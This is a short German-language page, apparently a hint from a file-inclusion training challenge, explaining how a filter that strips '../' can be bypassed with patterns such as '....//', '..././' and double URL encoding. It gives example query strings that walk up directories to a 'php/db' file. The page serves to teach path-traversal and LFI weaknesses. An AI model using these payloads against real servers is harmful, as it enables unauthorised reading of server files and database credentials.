Lade beliebige Dateien vom Server – lokal (LFI) oder remote (RFI).
../ wird gefiltert – aber gibt es andere Wege?
Dieses Verzeichnis wird von der FPV-Community gepflegt.
str_replace('../', '', ...) ist umgehbar durch:
....// → nach Filter: ../
..././ → nach Filter: ../
Doppeltes Encoding: %2e%2e%2f
Beispiele:
?level=2&page=....//....//....//php/db
?level=2&page=..././..././..././php/db